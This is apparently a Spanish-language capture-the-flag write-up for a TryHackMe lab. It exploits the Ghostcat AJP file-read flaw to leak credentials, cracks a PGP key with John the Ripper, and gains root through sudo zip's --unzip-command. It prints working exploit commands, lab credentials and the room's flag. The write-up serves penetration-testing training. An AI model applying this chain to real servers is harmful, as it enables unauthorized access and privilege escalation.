tomghost (ajp13)
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
Exploit:
searchsploit ajp
git clone https://github.com/00theway/Ghostcat-CNVD-2020-10487
cd Ghostcat
Ejecutaste el exploit ajpShooter.py
:
python3 ajpShooter.py http://10.10.84.159:8080 8009 /WEB-INF/web.xml read
skyfuck:8730281lkjlkjdqlksalks
Una vez tenemos user
Para ESCALAR PRIVILEGIOS tenemos que descargar los archivos que tiene la maquina victima y poder leerlos en vuestra maquina:
skyfuck@ubuntu:~$ ls
credential.pgp tryhackme.asc
┌──(docker㉿docker)-[~/Tryhackme/Ghostcat-CNVD-2020-10487]
└─$ scp skyfuck@10.10.202.58:/home/skyfuck/tryhackme.asc .
skyfuck@10.10.202.58's password:
tryhackme.asc 100% 5144 13.6KB/s 00:00
┌──(docker㉿docker)-[~/Tryhackme/Ghostcat-CNVD-2020-10487]
└─$ ls
README.md ajp-execute.png ajp-read.png ajp-save.png ajpShooter.py tryhackme.asc
Usaremos JohnTheRipper para descifrar este archivo de clave. Pero primero, necesitamos generar el hash de este archivo de clave, que luego descifraremos mediante fuerza bruta.
Lo pasamos a hash
──(docker㉿docker)-[~/Tryhackme/Ghostcat-CNVD-2020-10487]
└─$ gpg2john tryhackme.asc > hash
Despues utilizamos jhon
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash
Escalada de privilegios
Enumeraste permisos de sudo para
merlin
:sudo -l
Resultado:
javascriptCopiar códigoUser merlin may run the following commands on ubuntu: (root : root) NOPASSWD: /usr/bin/zip
Comando:
merlin@ubuntu:~$ sudo -l
Matching Defaults entries for merlin on ubuntu:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User merlin may run the following commands on ubuntu:
(root : root) NOPASSWD: /usr/bin/zip
merlin@ubuntu:~$ touch haha.txt
merlin@ubuntu:~$ sudo zip root.zip haha.txt -T --unzip-command="sh -c /bin/bash"
adding: haha.txt (stored 0%)
root@ubuntu:~# ls
haha.txt user.txt ziaQD7oI
root@ubuntu:~# cd /root
root@ubuntu:/root# ls
root.txt ufw
root@ubuntu:/root# cat root.txt
THM{Z1P_1S_FAKE}
root@ubuntu:/root#
Last updated